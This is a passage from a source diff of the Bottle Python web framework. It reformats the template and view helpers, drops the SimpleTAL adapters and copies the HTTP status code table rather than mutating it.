TEMPLATE_PATH) @@ -3117,17 +3832,19 @@ def template(*args, **kwargs): TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings) if not TEMPLATES[tplid]: abort(500, 'Template (%s) not found' % tpl) - for dictarg in args[1:]: kwargs.update(dictarg) + for dictarg in args[1:]: + kwargs.update(dictarg) return TEMPLATES[tplid].render(kwargs) + mako_template = functools.partial(template, template_adapter=MakoTemplate) -cheetah_template = functools.partial(template, template_adapter=CheetahTemplate) +cheetah_template = functools.partial(template, + template_adapter=CheetahTemplate) jinja2_template = functools.partial(template, template_adapter=Jinja2Template) -simpletal_template = functools.partial(template, template_adapter=SimpleTALTemplate) def view(tpl_name, **defaults): - ''' Decorator: renders a template for a handler. + """ Decorator: renders a template for a handler. The handler can control its behavior like that: - return a dict of template vars to fill out the template @@ -3135,8 +3852,10 @@ def view(tpl_name, **defaults): process the template, but return the handler result as is. This includes returning a HTTPResponse(dict) to get, for instance, JSON with autojson or other castfilters. - ''' + """ + def decorator(func): + @functools.wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) @@ -3147,48 +3866,45 @@ def view(tpl_name, **defaults): elif result is None: return template(tpl_name, defaults) return result + return wrapper + return decorator + mako_view = functools.partial(view, template_adapter=MakoTemplate) cheetah_view = functools.partial(view, template_adapter=CheetahTemplate) jinja2_view = functools.partial(view, template_adapter=Jinja2Template) -simpletal_view = functools.partial(view, template_adapter=SimpleTALTemplate) - - - - - ############################################################################### # Constants and Globals ######################################################## ############################################################################### - TEMPLATE_PATH = ['./', './views/'] TEMPLATES = {} DEBUG = False -NORUN = False # If set, run() does nothing. Used by load_app() +NORUN = False # If set, run() does nothing. Used by load_app() #: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found') -HTTP_CODES = httplib.responses -HTTP_CODES[418] = "I'm a teapot" # RFC 2324 +HTTP_CODES = httplib.responses.copy() +HTTP_CODES[418] = "I'm a teapot" # RFC 2324 HTTP_CODES[428] = "Precondition Required" HTTP_CODES[429] = "Too Many Requests" HTTP_CODES[431] = "Request Header Fields Too Large" HTTP_CODES[511] = "Network Authentication Required" -_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items()) +_HTTP_STATUS_LINES = dict((k, '%d %s' % (k, v)) + for (k, v) in HTTP_CODES.items()) #: The default template used for error pages. Override with @error() ERROR_PAGE_TEMPLATE = """ %%try: - %%from %s import DEBUG, HTTP_CODES, request, touni + %%from %s import DEBUG, request <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: {{e.status}}